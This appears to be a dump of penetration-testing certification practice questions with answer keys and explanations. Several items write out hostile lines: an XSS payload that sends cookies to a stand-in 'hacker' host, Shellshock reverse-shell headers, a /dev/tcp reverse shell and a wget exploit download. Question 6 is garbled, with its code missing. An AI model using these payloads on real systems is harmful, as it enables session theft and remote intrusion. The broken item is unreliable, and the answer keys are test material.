NEW QUESTION 1
Given the following code:
<SCRIPT>var+img=new+Image();img.src=”http://hacker/%20+%20document.cookie;</SCRIPT>
Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

• A. Web-application firewall
• B. Parameterized queries
• C. Output encoding
• D. Session tokens
• E. Input validation
• F. Base64 encoding

Answer: CE

Explanation:
Encoding (commonly called “Output Encoding”) involves translating special characters into some different but equivalent form that is no longer dangerous in the target interpreter, for example translating the < character into the &lt; string when writing to an HTML page.
Output encoding and input validation are two of the best methods to prevent against this type of attack, which is known as cross-site scripting (XSS). Output encoding is a technique that converts user-supplied input into a safe format that prevents malicious scripts from being executed by browsers or applications. Input validation is a technique that checks user-supplied input against a set of rules or filters that reject any invalid or malicious data. Web-application firewall is a device or software that monitors and blocks web traffic based on predefined rules or signatures, but it may not catch all XSS attacks. Parameterized queries are a technique that separates user input from SQL statements to prevent SQL injection attacks, but they do not prevent XSS attacks. Session tokens are values that are used to maintain state and identify users across web requests, but they do not prevent XSS attacks. Base64 encoding is a technique that converts binary data into ASCII characters for transmission or storage purposes, but it does not prevent XSS attacks.

NEW QUESTION 2
A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?

• A. nmap –vv sUV –p 53, 123-159 10.10.1.20/24 –oA udpscan
• B. nmap –vv sUV –p 53,123,161-162 10.10.1.20/24 –oA udpscan
• C. nmap –vv sUV –p 53,137-139,161-162 10.10.1.20/24 –oA udpscan
• D. nmap –vv sUV –p 53, 122-123, 160-161 10.10.1.20/24 –oA udpscan

Answer: C

NEW QUESTION 3
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/127.0.0.1/9090 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

• A. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i id;whoami”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
• B. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& find / -perm -4000”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
• C. exploits = {“User-Agent”: “() { ignored;};/bin/sh –i ps –ef” 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
• D. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/10.10.1.1/80” 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

Answer: A

NEW QUESTION 4
Company.com has hired a penetration tester to conduct a phishing test. The tester wants to set up a fake log-in page and harvest credentials when target employees click on links in a phishing email. Which of the following commands would best help the tester determine which cloud email provider the log-in page needs to mimic?

• A. dig company.com MX
• B. whois company.com
• C. cur1 www.company.com
• D. dig company.com A

Answer: A

Explanation:
The dig command is a tool that can be used to query DNS servers and obtain information about domain names, such as IP addresses, mail servers, name servers, or other records. The MX option specifies that the query is for mail exchange records, which are records that indicate the mail servers responsible for accepting email messages for a domain. Therefore, the command dig company.com MX would best help the tester determine which cloud email provider the log-in page needs to mimic by showing the mail servers for company.com. For example, if the output shows something like company-com.mail.protection.outlook.com, then it means that company.com uses Microsoft Outlook as its cloud email provider. The other commands are not as useful for determining the cloud email provider. The whois command is a tool that can be used to query domain name registration information, such as the owner, registrar, or expiration date of a domain. The curl command is a tool that can be used to transfer data from or to a server using various protocols, such as HTTP, FTP, or SMTP. The dig command with the A option specifies that the query is for address records, which are records that map domain names to IP addresses.

NEW QUESTION 5
Which of the following types of information would MOST likely be included in an application security assessment report addressed to developers? (Choose two.)

• A. Use of non-optimized sort functions
• B. Poor input sanitization
• C. Null pointer dereferences
• D. Non-compliance with code style guide
• E. Use of deprecated Javadoc tags
• F. A cydomatic complexity score of 3

Answer: BC

NEW QUESTION 6
Given the following code:

Which of the following data structures is systems?

• A. A tuple
• B. A tree
• C. An array
• D. A dictionary

Answer: D

Explanation:
A dictionary is a data structure in Python that stores key-value pairs, where each key is associated with a value. A dictionary is created by enclosing the key-value pairs in curly braces and separating them by commas. A dictionary can be accessed by using the keys as indexes or by using methods such as keys(), values(), or items(). In the code, systems is a dictionary that has four key-value pairs, each representing an IP address and its corresponding operating system. A tuple is a data structure in Python that stores an ordered sequence of immutable values, enclosed in parentheses and separated by commas. A tree is a data structure that consists of nodes connected by edges, forming a hierarchical structure with a root node and leaf nodes. An array is a data structure that stores a collection of elements of the same type in a contiguous memory location.

NEW QUESTION 7
A company has hired a penetration tester to deploy and set up a rogue access point on the network. Which of the following is the BEST tool to use to accomplish this goal?

• A. Wireshark
• B. Aircrack-ng
• C. Kismet
• D. Wifite

Answer: B

NEW QUESTION 8
A penetration tester ran the following command on a staging server:
python –m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?

• A. nc 10.10.51.50 9891 < exploit
• B. powershell –exec bypass –f \\10.10.51.50\9891
• C. bash –i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit
• D. wget 10.10.51.50:9891/exploit

Answer: D

NEW QUESTION 9
A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider’s metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited?

• A. Cross-site request forgery
• B. Server-side request forgery
• C. Remote file inclusion
• D. Local file inclusion

Answer: B

Explanation:
Server-side request forgery (SSRF) is the vulnerability that the tester exploited by querying the provider’s metadata and getting the credentials used by the instance to authenticate itself. SSRF is a type of attack that abuses a web application to make requests to other resources or services on behalf of the web server. This can allow an attacker to access internal or external resources that are otherwise inaccessible or protected. In this case, the tester was able to access the metadata service of the cloud provider, which contains sensitive information about the instance, such as credentials, IP addresses, roles, etc.

NEW QUESTION 10
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?

• A. Run nmap with the –o, -p22, and –sC options set against the target
• B. Run nmap with the –sV and –p22 options set against the target
• C. Run nmap with the --script vulners option set against the target
• D. Run nmap with the –sA option set against the target

Answer: C

Explanation:
Running nmap with the --script vulners option set against the target would best support the task of identifying CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running, as it will use an NSE script that checks for vulnerabilities based on version information from various sources, such as CVE databases2. The --script option allows users to specify which NSE scripts to run during an Nmap scan.

NEW QUESTION 11
During an assessment, a penetration tester obtains a list of 30 email addresses by crawling the target company's website and then creates a list of possible usernames based on the email address format. Which of the following types of attacks would MOST likely be used to avoid account lockout?

• A. Mask
• B. Rainbow
• C. Dictionary
• D. Password spraying

Answer: D

Explanation:
Password spraying is a type of password guessing attack that involves trying one or a few common passwords against many usernames or accounts. Password spraying can avoid account lockout policies that limit the number of failed login attempts per account by spreading out the attempts over time and across different accounts. Password spraying can also increase the chances of success by using passwords that are likely to be used by many users, such as default passwords, seasonal passwords, or company names. Mask is a type of password cracking attack that involves using a mask or a pattern to generate passwords based on known or guessed characteristics of the password, such as length, case, or symbols. Rainbow is a technique of storing precomputed hashes of passwords in a table that can be used to quickly crack passwords by looking up the hashes. Dictionary is a type of password cracking attack that involves using a wordlist or a dictionary of common or likely passwords to try against an account.

NEW QUESTION 12
A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible.
Which of the following Nmap scan syntaxes would BEST accomplish this objective?

• A. nmap -sT -vvv -O 192.168.1.2/24 -PO
• B. nmap -sV 192.168.1.2/24 -PO
• C. nmap -sA -v -O 192.168.1.2/24
• D. nmap -sS -O 192.168.1.2/24 -T1

Answer: D

NEW QUESTION 13
A consultant just performed a SYN scan of all the open ports on a remote host and now needs to remotely identify the type of services that are running on the host. Which of the following is an active reconnaissance tool that would be BEST to use to accomplish this task?

• A. tcpdump
• B. Snort
• C. Nmap
• D. Netstat
• E. Fuzzer

Answer: C

NEW QUESTION 14
Which of the following describe the GREATEST concerns about using third-party open-source libraries in application code? (Choose two.)

• A. The libraries may be vulnerable
• B. The licensing of software is ambiguous
• C. The libraries’ code bases could be read by anyone
• D. The provenance of code is unknown
• E. The libraries may be unsupported
• F. The libraries may break the application

Answer: AD

Explanation:
A. The libraries may be vulnerable to security bugs or exploits that can compromise the application or
the data. According to the web search results, open-source libraries often have vulnerabilities that can be exploited by attackers, such as Heartbleed, Shellshock, DROWN, or npm left-pad1234. These vulnerabilities can allow attackers to extract sensitive data, execute arbitrary commands, decrypt encrypted traffic, or break the functionality of the application. Therefore, using third-party open-source libraries in application code poses a significant security risk.
D. The provenance of code is unknown, meaning that the origin and history of the code are not verified or documented. According to the web search results, open-source libraries and client projects are developed and continuously evolving in an asynchronous way, which makes it difficult to track the changes and updates of the code2. Moreover, open-source libraries may have dependencies on other libraries, which can introduce additional risks or vulnerabilities1. Therefore, using third-party
open-source libraries in application code poses a significant quality risk.

NEW QUESTION 15
User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?

• A. MD5
• B. bcrypt
• C. SHA-1
• D. PBKDF2

Answer: A

NEW QUESTION 16
A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment?

• A. Ensure the client has signed the SOW.
• B. Verify the client has granted network access to the hot site.
• C. Determine if the failover environment relies on resources not owned by the client.
• D. Establish communication and escalation procedures with the client.

Answer: A

Explanation:
The statement of work (SOW) is a document that defines the scope, objectives, deliverables, and timeline of a penetration testing engagement. It is important to have the client sign the SOW before starting the assessment to avoid any legal or contractual issues.

NEW QUESTION 17
A penetration tester is able to use a command injection vulnerability in a web application to get a reverse shell on a system After running a few commands, the tester runs the following:
python -c 'import pty; pty.spawn("/bin/bash")'
Which of the following actions Is the penetration tester performing?

• A. Privilege escalation
• B. Upgrading the shell
• C. Writing a script for persistence
• D. Building a bind shell

Answer: B

Explanation:
The penetration tester is performing an action called upgrading the shell, which means improving the functionality and interactivity of the shell. By running the python command, the penetration tester is spawning a new bash shell that has features such as tab completion, command history, and job control. This can help the penetration tester to execute commands more easily and efficiently.

NEW QUESTION 18
......